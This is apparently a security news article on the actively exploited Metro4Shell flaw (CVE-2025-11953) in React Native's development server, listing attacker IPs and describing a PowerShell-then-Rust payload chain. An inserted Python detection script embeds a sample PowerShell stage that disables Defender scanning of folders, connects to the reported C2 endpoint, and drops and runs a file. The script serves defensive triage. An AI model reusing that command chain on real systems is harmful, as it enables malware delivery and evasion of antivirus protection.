A critical security vulnerability in the Metro Development Server, part of the widely used “@react-native-community/cli” npm package, is actively being exploited by threat actors. The flaw, tracked as CVE-2025-11953 and dubbed “Metro4Shell,” carries a severe CVSS score of 9.8 and allows remote, unauthenticated attackers to execute arbitrary operating system commands on vulnerable hosts. Cybersecurity firm VulnCheck reported observing exploitation of this vulnerability beginning on December 21, 2025, more than a month after JFrog first documented it in November 2025.
Exploitation of Metro4Shell Poses Significant Risk
Although they have received little public acknowledgment, these in-the-wild exploits illustrate a concerning trend of development infrastructure being targeted. VulnCheck’s analysis of an attack observed on its honeypot network found threat actors weaponizing CVE-2025-11953 to deploy a Base64-encoded PowerShell script. Once decoded, the script performs several malicious actions, including creating exclusions in Microsoft Defender Antivirus for the current working directory and the temporary folder.
Additionally, the PowerShell script establishes a direct TCP connection to an IP address and port controlled by the attackers, specifically ‘8.218.43[.]248:60124’. From this connection, the script retrieves further data, saves it to a file within the temporary directory, and then executes it. The downloaded secondary payload is written in Rust and incorporates anti-analysis techniques designed to impede static examination by security researchers.
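As an added defender-side illustration (not code from VulnCheck, JFrog, or the report): a small Python triage routine that expands PowerShell `-EncodedCommand` arguments found in process-creation logs and flags the behaviours described above. The log lines and the first-stage sketch are constructed for this example rather than taken from the real payload; the only value drawn from the report is the callback endpoint 8.218.43.248:60124.

```python
import base64
import re

# Indicator the report names: the attacker-controlled endpoint the first stage calls back to.
KNOWN_C2 = {("8.218.43.248", 60124)}
# Behaviours of the described PowerShell stage, expressed as case-insensitive regexes.
PATTERNS = {
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    "raw_tcp_client": re.compile(r"Net\.Sockets\.TcpClient", re.I),
    "temp_drop_and_run": re.compile(r"\$env:TEMP.*?Start-Process", re.I | re.S),
}
C2_RE = re.compile(r"TcpClient\(\s*['\"](\d{1,3}(?:\.\d{1,3}){3})['\"]\s*,\s*(\d+)\s*\)", re.I)
ENC_RE = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Expand a -EncodedCommand argument (Base64 of UTF-16LE) so the patterns can see the script."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed encoding: fall back to scanning the raw command line

def analyze(cmdline):
    """Return the set of behaviour tags found in one process-creation command line."""
    script = decode_encoded_command(cmdline)
    tags = {name for name, rx in PATTERNS.items() if rx.search(script)}
    for ip, port in C2_RE.findall(script):
        if (ip, int(port)) in KNOWN_C2:
            tags.add("known_c2_endpoint")
    return tags

def encode_ps(script):
    """Produce the -EncodedCommand form PowerShell expects; used here only to build a sample line."""
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed sample log lines (not the real payload): a sketch of the reported first stage,
# a benign use of the temp folder, and a plain unencoded exclusion change by an administrator.
STAGE1_SKETCH = """Add-MpPreference -ExclusionPath (Get-Location).Path
Add-MpPreference -ExclusionPath $env:TEMP
$c = New-Object Net.Sockets.TcpClient('8.218.43.248', 60124)
$p = Join-Path $env:TEMP 'stage2.exe'
Start-Process $p"""
SAMPLE_LOGS = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_ps(STAGE1_SKETCH),
    'powershell.exe -NoProfile -Command "Get-ChildItem $env:TEMP | Measure-Object"',
    "powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\\Builds'",
]
```

A lone `defender_exclusion` hit is a lower-confidence signal worth reviewing; the full combination of exclusion, raw TCP client, temp-folder drop and known endpoint in one command line matches the chain the report describes.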
The observed attacks have been linked to several originating IP addresses, including 5.109.182[.]231, 223.6.249[.]141, and 134.209.69[.]155. VulnCheck emphasizes that this activity is not experimental, noting that the consistent delivery of similar payloads over multiple weeks indicates sustained operational use rather than simple vulnerability probing or proof-of-concept testing.
Implications for the React Native Development Ecosystem
The exploitation of CVE-2025-11953 highlights a persistent challenge in securing software development pipelines. As VulnCheck points out, development infrastructure inadvertently becomes production infrastructure the moment it is accessible externally, regardless of its intended purpose. This critical vulnerability in the Metro Development Server, a key component for React Native development, could allow attackers to gain a foothold on developer machines or build servers.
The severity of the Metro4Shell vulnerability lies in its ability to execute arbitrary commands without prior authentication, making it a prime target for initial access. The subsequent deployment of a Rust-based payload with anti-analysis features suggests a sophistication in the threat actors’ operations, aiming for persistent access and potentially further lateral movement within targeted networks.
The lack of broad public acknowledgment of these ongoing exploits is a concerning development. Developers and organizations relying on the “@react-native-community/cli” package should prioritize immediate assessment and remediation efforts. This includes ensuring that the specific version of the package used is not vulnerable and that development environments are adequately secured to prevent unauthorized access.
Moving forward, the focus will likely be on the release and adoption of patched versions of the “@react-native-community/cli” package. The security community will be closely monitoring for further exploitation attempts and the effectiveness of mitigation strategies. Organizations should remain vigilant and proactive in their security posture to defend against such evolving threats targeting critical development tools within the open-source ecosystem.